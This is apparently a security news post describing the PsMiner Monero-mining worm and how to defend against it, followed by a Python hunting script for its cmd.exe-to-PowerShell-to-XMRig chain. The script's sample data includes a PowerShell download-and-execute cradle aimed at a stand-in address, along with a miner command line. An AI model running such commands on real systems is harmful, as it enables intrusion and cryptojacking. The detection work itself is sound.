PsMiner propagates by exploiting known vulnerabilities and weak credentials


The AchieVer

  • ‘PsMiner’ is written in the Go language and includes worm-like capabilities.
  • The malware spreads by exploiting known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, WebLogic, ThinkPHP, and SQL Server.

The 360 Total Security team uncovered a new Monero mining malware dubbed ‘PsMiner’ that is written in the Go language and includes worm-like capabilities.

How does it propagate?

  • The malware spreads by exploiting known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, WebLogic, ThinkPHP, and SQL Server.
  • It also spreads by abusing weak system credentials.

What are its capabilities?

  • PsMiner can brute-force weak or default system credentials using its password-cracking module.
  • After successfully exploiting a vulnerability or weak credentials, the malware can execute PowerShell commands on the victim’s machine via cmd.exe.
  • The executable downloads a malicious ‘WindowsUpdate.ps1’ payload, which drops the Monero miner.
  • PsMiner then uses the open-source XMRig CPU miner to mine the Monero cryptocurrency.

Worth noting: the 360 Total Security team noted that PsMiner acquired a total of about 0.88 Monero in just two weeks.

How to stay protected?

  • To stay protected from such malware, it is highly recommended to patch all known vulnerabilities; users should upgrade to the patched versions.
  • It is also recommended to reset all default passwords to strong, unique, and complex passwords.
  • Users must ensure passwords are periodically rotated and all systems are kept up to date.
  • It is always best to install good antivirus software.

“PsMiner exploits a variety of high-risk vulnerabilities, as of now, the relevant manufacturers have completed the repair, it is recommended that affected users upgrade the relevant server components as soon as possible,” 360 Total Security stated in their blog.
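The execution chain the post describes (cmd.exe spawning PowerShell, which downloads WindowsUpdate.ps1 and then drops XMRig) is something a defender can hunt for in process-creation telemetry. The Python below is an added example, not code from the post or from 360 Total Security: it runs a few correlated checks over constructed Sysmon-style process records and flags the chain while leaving a locally run script that merely shares the WindowsUpdate.ps1 file name alone. The host names, file paths, the 192.0.2.10 address, the pool address and the XMRig command-line options are all assumptions made up for the example; the download-cradle and encoded-command patterns are general PowerShell knowledge rather than details from the post.

```python
"""Hunt for the PsMiner-style chain described in the post over process-creation
records: cmd.exe -> powershell.exe -> download of WindowsUpdate.ps1 -> XMRig.

Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); any EDR
export with the same fields can be mapped onto ProcEvent.  All events below are
constructed sample data, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str


# PowerShell download cradles (general PowerShell knowledge, not taken from the post).
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|start-bitstransfer",
    re.I)
# -e/-enc/-EncodedCommand hides the cradle from plain string matching.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\b", re.I)
# Payload file name named in the post.
PAYLOAD_NAME = re.compile(r"windowsupdate\.ps1", re.I)
# Assumed typical XMRig / stratum markers; the post only names the miner.
MINER_ARGS = re.compile(r"stratum\+tcp://|--donate-level|\bxmrig\b", re.I)


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[tuple[str, str]]:
    """Return (severity, reason) tags for one event; empty list when nothing matches."""
    tags = []
    child, parent = basename(ev.image), basename(ev.parent_image)
    cmd = ev.command_line
    # The file name alone is a weak indicator: require the cmd.exe parent and a cradle.
    if child == "powershell.exe" and parent == "cmd.exe":
        cradle = DOWNLOAD_CRADLE.search(cmd) is not None
        if cradle and PAYLOAD_NAME.search(cmd):
            tags.append(("high", "cmd.exe-launched PowerShell downloading WindowsUpdate.ps1"))
        elif cradle:
            tags.append(("medium", "cmd.exe-launched PowerShell with download cradle"))
        elif ENCODED_FLAG.search(cmd):
            tags.append(("medium", "cmd.exe-launched PowerShell with encoded command"))
    if child.startswith("xmrig") or MINER_ARGS.search(cmd):
        tags.append(("high", "XMRig binary or stratum mining arguments"))
    return tags


def hunt(events) -> dict[str, list[tuple[str, str, str]]]:
    """Group (severity, reason, command line) findings per host so the chain is visible together."""
    findings: dict[str, list[tuple[str, str, str]]] = {}
    for ev in events:
        for sev, reason in classify(ev):
            findings.setdefault(ev.host, []).append((sev, reason, ev.command_line))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed sample events (hosts, paths, 192.0.2.10 and the pool address are made up).
SAMPLE_EVENTS = [
    ProcEvent("srv-01", PS, CMD,
              "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://192.0.2.10/WindowsUpdate.ps1')\""),
    ProcEvent("srv-01", r"C:\Users\Public\xmrig.exe", PS,
              "xmrig.exe -o stratum+tcp://pool.example:3333 -u 4ABCDEFGHwallet --donate-level 1"),
    # Locally run script with the same file name, started from Explorer: no cradle, benign.
    ProcEvent("ws-07", PS, r"C:\Windows\explorer.exe",
              r"powershell -ExecutionPolicy Bypass -File C:\Scripts\WindowsUpdate.ps1"),
    ProcEvent("ws-07", PS, CMD, "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0A"),
    ProcEvent("ws-07", PS, CMD, "powershell -c Get-Service wuauserv"),
]

if __name__ == "__main__":
    for host, hits in hunt(SAMPLE_EVENTS).items():
        for sev, reason, cmd in hits:
            print(f"{host}: [{sev}] {reason}: {cmd}")
```

In a real pipeline the encoded-command case should be decoded (base64 of UTF-16LE text) and re-run through the same cradle and payload checks rather than flagged as merely medium, and the XMRig match is only worth a high severity because the post ties the miner to this chain; XMRig also has legitimate users, so pair the hit with the PowerShell download on the same host before escalating.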

